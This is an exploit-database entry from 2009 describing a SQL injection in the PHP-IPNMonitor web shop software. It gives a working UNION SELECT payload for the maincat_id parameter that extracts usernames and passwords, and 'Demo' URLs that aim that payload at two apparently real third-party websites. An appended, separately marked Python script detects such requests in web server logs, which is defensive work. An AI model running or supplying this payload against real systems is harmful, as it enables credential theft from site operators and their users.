PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability

2009-09-11T00:00:00
ID 1337DAY-ID-5759
Type zdt
Reporter noname
Modified 2009-09-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
==============================================================
PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability
==============================================================


[+] SQL injection vulnerability
[+] PHP-IPNMonitor - sell digital downloads online
[+] Download : http://www.withinweb.com/phpipnmonitor/
 
[+] Bugs = index.php?maincat_id=
 
[+] exploit = -null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--


[+] Example
[+]        : http://localhost/[path]/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--



[+] Demo 
[+]        : http://www.beardsmith.com/ipnmonitor/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--
[+]        : http://www.earrelaphant.com/ipnmonitor/cart/index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--
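
[+] Detection (added example, not part of the original advisory and not PHP-IPNMonitor code): a log check that flags any maincat_id value that is not a plain integer, which is how requests of the form shown above stand out in web server logs. It assumes combined-format access logs and that legitimate category ids are non-negative integers; the log lines in SAMPLE_LOG are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a plain non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")
# SQL text that has no place in a numeric id.
SQL_TOKEN_RE = re.compile(r"\b(union|select|concat|from)\b|--|/\*|0x[0-9a-f]+", re.I)

# Constructed sample log lines (addresses are from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2009:10:00:01 +0000] "GET /index.php?maincat_id=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Sep/2009:10:00:07 +0000] "GET /index.php?maincat_id=-null+union+select'
    '+concat(username,0x3a,userpassword)+from+ipn_tblpasswords-- HTTP/1.1" 200 812',
    '192.0.2.44 - - [11/Sep/2009:10:00:09 +0000] "GET /index.php?maincat_id=%2dnull%20UNION%20SELECT%201 HTTP/1.1" 200 640',
    '192.0.2.51 - - [11/Sep/2009:10:02:30 +0000] "GET /index.php?maincat_id=abc HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/Sep/2009:10:03:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 100',
]

def check_line(line):
    """Return (decoded_value, reason) for a suspicious maincat_id, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qs percent-decodes and maps '+' to a space, so encoded variants
    # are compared in the same form the application receives them.
    for value in parse_qs(query, keep_blank_values=True).get("maincat_id", []):
        if VALID_ID_RE.fullmatch(value):
            continue
        reason = "sql-tokens" if SQL_TOKEN_RE.search(value) else "non-numeric"
        return value, reason
    return None

def scan(lines):
    """Return [(line_number, decoded_value, reason)] for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        result = check_line(line)
        if result:
            hits.append((number, *result))
    return hits

if __name__ == "__main__":
    for number, value, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}: {value!r}")
```

Only the query string is inspected, so a maincat_id sent in a POST body does not appear in these logs. The same integer-only rule applied inside the application, together with a parameterized query, removes the injection point itself.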




#  0day.today [2018-03-14]  #